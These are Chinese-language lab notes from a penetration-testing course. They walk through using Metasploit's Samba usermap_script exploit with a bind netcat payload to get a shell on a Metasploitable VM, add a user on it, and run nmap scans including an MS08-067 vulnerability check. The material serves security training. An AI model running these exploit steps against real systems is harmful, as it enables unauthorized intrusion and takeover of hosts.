内容发布更新时间 : 2024/4/27 14:57:11星期一 下面是文章的全部内容请认真阅读。

渗透测试培训 3月13日

第一天：主要实验总结

首先利用struts2漏洞，可以直接执行任意命令，取得主机控制权。 实验环境：

KALI linux 作为攻击工具； owasp 作为靶机

2003 metaspoitable 实现能够成功访问

使用metaspliot完成对于靶机samba 服务的攻击，获取shell 权限 search samba 查找模块

Use multi/samba/usemap_script 选择渗透攻击模块 Show payloads 查看与该渗透模块相兼容的攻击载荷

Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shell Show options 查看需要设置的参数

Set RHOST 10.10.10.254 设置主机攻击主机 Exploit启动攻击

1、首先安装vm虚拟机程序，开启kali，owasp和metaspoitalbe等工具和搭建环境，使得网络可达，网络配置上选择nat模式，地址范围为10.10.10.0/24 2、开启kali虚机，进入root模式，

首先进入msfconsle，修改初始密码为123456 msf〉> passwd [*] exec: passwd

输入新的 UNIX 密码：

重新输入新的 UNIX 密码： passwd：已成功更新密码

然后寻找samba模块 msf > search samba

Matching Modules ================

Name Disclosure Date Rank Description ---- --------------- ---- -----------

auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal

auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow

auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow

auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow

exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)

exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)

exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow

exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow

exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)

exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow

exploit/multi/samba/usermap_script 2007-05-14 excellent Samba \map script\

exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)

exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)

exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution

exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution

exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow

exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow

post/linux/gather/enum_configs normal Linux Gather Configurations

msf > use multi/samba/usermap_script 选择渗透攻击模块

msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷 Compatible Payloads ===================

Name Disclosure Date Rank Description ---- --------------- ---- -----------

cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)

cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd) cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)

cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)

cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6

cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6

cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)

cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6

cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic normal Unix Command, Generic Command Execution

cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)

cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK)

cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua)

cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)

cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e)

cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)

cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)

cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)

cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php)

cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)

cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)

cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)

cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)

cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shell payload => cmd/unix/bind_netcat

msf exploit(usermap_script) > show options 查看需要设置的参数

msf exploit(usermap_script) > set RHOST 10.10.10.254设置主机攻击主机 RHOST => 10.10.10.254

msf exploit(usermap_script) > exploit启动攻击

[*] Started bind handler

[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800 已经取得10.10.10.254机子的控制权，可以增加用户 useradd test 用户增加成功

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 存活探测 -PU -sn UDP ping不列服务，-Pn不适用ping

nmap -sS -Pn xx.xx.xx.xx tcp syn 扫描 不发送icmp namp -sV -Pn xx.xx.xx.xx 列出服务详细信息

namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

nmap 网站扫描

msf > nmap

msf > nmap -sV -Pn 10.10.10.254 [*] exec: nmap -sV -Pn 10.10.10.254

Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CST Nmap scan report for 10.10.10.254 Host is up (0.00020s latency).

All 1000 scanned ports on 10.10.10.254 are filtered MAC Address: 00:50:56:E7:1B:31 (VMware)

Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

msf > nmap -PO -script=smb-check-vulns 10.10.10.254 [*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254

Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CST Nmap scan report for 10.10.10.254 Host is up (0.00021s latency).

All 1000 scanned ports on 10.10.10.254 are filtered MAC Address: 00:50:56:E7:1B:31 (VMware)

map done: 1 IP address (1 host up) scanned in 23.06 seconds